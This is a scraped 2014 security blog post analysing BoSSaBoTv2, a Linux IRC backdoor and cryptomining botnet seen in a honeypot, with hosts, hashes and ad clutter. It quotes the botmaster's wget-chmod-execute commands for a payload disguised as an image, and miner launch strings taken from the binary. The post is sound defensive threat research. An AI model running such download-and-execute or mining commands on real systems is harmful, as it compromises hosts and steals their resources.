Projet antiMalwares Comparatif Antivirus Soutenir Malekal.com Forum
Me contacter
malekal's site site entraide informatique
Rechercher... Rechercher Articles/Papiers Projet antiMalwares Comparatif Antivirus Soutenir Malekal.com Forum Me contacter Flux RSS
Global Internet Backbone
he.net/ip_transit/IPv6+IPv4 Transit For Your Network New Special 10 Gbps $4000/month
[en] BoSSaBoTv2 : another Linux
Backdoor IRC
Par Menu Accueil News Malwares / Informatique / Internet12 2 41 2 Share 70
Today, i was looking at my web honeypot and this one pay my attention :
http://www.malekal.com/modsec/index.php?ip=178.32.59.202
The PHP vulnerability is very used (already wrote something about it :
http://www.malekal.com/2014/03/31/backdoor-perl-shellbot-b-et-backdoor-linux-tsunami-a/ ) but it was the first time i saw thoses base64decode code.
The code lead to haxmeup.uni.me (192.95.12.34 – OVH) that redirect to http://www.bilder-upload.eu/thumb/41130a-1408995611.jpg
I expect to get a PHP-Shellbot as usual, but this time, it was a FUD binary :
https://www.virustotal.com/fr/file
/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/analysis /1409041374/
so i launch it :
Click this bar to view the full image.
Click this bar to view the full image.
Share Tweet Share
GNU/Linux Basique Général Réseau Windows General Malwares Sécurité Windows Tutoriaux Logiciels News du site / Vrac
Publicité ?>
Rejoignez-nous sur Facebook
made a connection to 37.59.74.161 (OVH again) port 8067, there is an ircd behind :
nmap -sV 37.59.74.161 -p 8067
Starting Nmap 6.00 ( http://nmap.org ) at 2014-08-26 10:47 CEST Nmap scan report for 37.59.74.161
Host is up (0.027s latency). PORT STATE SERVICE VERSION 8067/tcp open irc Unreal ircd Service Info: Host: irc.wix.wix
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Top menaces Pos. Menaces 1. PUPs MySearchDial - Trovi -istart.webssearches.com - istartsurf 2. Adware
Sweet Page - System SpeedUp - Mega
Browser - ViewPassword
- Ads by Keep now
3. Trojan
Antivirus Security Pro
-ZeroAccess / Sirefef
4.
Worm Virus USB Raccourcis
Plus de procédures de désinfection Partenaires Autoblog Malekal botnets.fr geekden Le blog de Chantal11 Liste Malwares – malekal.com PjJoint Malekal.com S!RI Blog
so an IRC Backdoor.
Click this bar to view the full image.
Another surprise, the ircd doesnt have any mod to hide users etc. ~40 bots, not so much.
So let’s play.
Click this bar to view the full image.
on the screenshot bellow, we can that the bostmaster launch a range IP scan, then some bots Exploit some servers.
We can see that the exploit at 200.185.236.85 was successfull because it joins the channel as a new bot.
Tigzy Roguekiller Xylibox Blog Publicités Mots clefs adware
adwares
Antispywares
Antivirantivirus
Avast!backdoor
botnet CD Live désinfection Eorezoexploit FirefoxNetwork Bandwidth Monitor
solarwinds.com
See Which Users, Apps & Protocols Are Consuming Bandwidth- Learn More ... Google Chromecast for $35 google.com/Chr
Enjoy online video & anything from the web on your TV. buy now!
...
confrimed by my VM.
We got an other DNS con32.cz.cc that give the same IP 192.95.12.34
Click this bar to view the full image.
Two new bots :
Click this bar to view the full image. Malwares PUP
ransomware
rogue
rogues
rootkit réseauscareware
spamspyware
spywares
Stealer TDSS
trojan
Trojan.Winlock
trojans
Tuto4PCtutorial
versvirus
Windows worms zbot ZeroAccess Publicités
The IRCd is new around ~40 bots in 9 days :
Click this bar to view the full image.
The botmaster made regularly download new binary – all from www.bilder-upload.eu (seems legitim)
!BOSS* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp !BOSS* SH mv /tmp/05fbc4-1409059856.jpg /tmp/4L2nJG5Vab
!BOSS* SH chmod 777 /tmp/4L2nJG5Vab !BOSS* SH /tmp/4L2nJG5Vab
Some Hashs and Hosts recap :
haxmeup.uni.me / con32.cz.cc / con64.cz.cc (192.95.12.34 – OVH) haxmedown.cz.cc 37.59.74.161
http://malwaredb.malekal.com/index.php?hash=35c950db3dc60b55e623ec591f8d7f33 http://malwaredb.malekal.com/index.php?hash=7f8cc390f7b3e53f2921f0debae09902 http://malwaredb.malekal.com/index.php?hash=dfb0291c04d6593103e6ac7a8954f19e
You need Flash player 8+ and JavaScript enabled to view this video.
Publicités
Click this bar to view the full image.
then i wrote a little script to send the email abuse, hope, they will lose some bots
Click this bar to view the full image.
MalwareMustDie decompile the binary, some strings : http://pjjoint.malekal.com /files.php?read=20140826_n7h14d5w5i6
Thanks to them. Bitcoin capabilities :
000000007BC0 /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null & 000000007C20 pkill minerd ; pkill m32 ; pkill m64
000000007C60 wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.
The most interresting :
000000007E1D BoSSaBoTv2-%s
a search at Google this topic on http://www.hackforums.net /showthread.php?tid=4395309
According the date post, the kit is new and the price is at 100$
Click this bar to view the full image.
Back, lot of attacks this WE : http://www.malekal.com/modsec/index.php?ip=213.73.31.13 http://www.malekal.com/modsec/index.php?ip=195.154.140.251 http://www.malekal.com/modsec/index.php?ip=5.135.64.105 http://www.malekal.com/modsec/index.php?ip=46.105.230.91 http://www.malekal.com/modsec/index.php?ip=128.233.173.167
Binaries are undetected
http://malwaredb.malekal.com
/index.php?hash=5453043042be4ad21259bcb9b17e9bd3 http://malwaredb.malekal.com
/index.php?hash=36263d91d726dcdb93b97ea05ae8656a
IRCd : 23.95.10.101 port 53
Click this bar to view the full image.
You may also like:
40
40 22
12 2 41 2 Share 70 Trojan.Chepvil et Trojan.Sasfis / Trojan.Cridex : les campagnes de Spam malicieux continuent SPAM/Virus Facebook : gagner un iphone 4S color
SpamHaus ransomware
Tutorial Dial-a-fix Supprimer Adware.Zango Supprimer
Win32/Stration.worm.Gen
/Email-Worm.Win32.Warezov.lp
Share Tweet Share
2 Comments
sneezing_panda
Posté le 8 septembre 2014 à 4:28
He’s an idiot. http://puu.sh/bqOYA/ebec4b2878.png People are already complaining on the HF thread.
1.
CyD
Posté le 8 septembre 2014 à 10:52
Using botnets of zombie computers to spread malicious code through
vulnerabilities in order to perform cyber-based attacks like denial-of-service is a big mistake. Please, report this kind of cybercrime activities to federal law
enforcement. Keep up the good work. 2.
Laisser un commentaire
Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *
Nom * E-Mail *
myturbopc.com
Remove all Malware in 2 mins. #1 Download for 2014. Rated 5/5!
Ce site est hébergé par la société OVH Plan du site
À propos du thème Arras
Commentaire
sert à rien d'exposer vos problèmes ici, allez sur le forum pour obtenir de l'aide : http://forum.malekal.com
Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>
Laisser un commentaire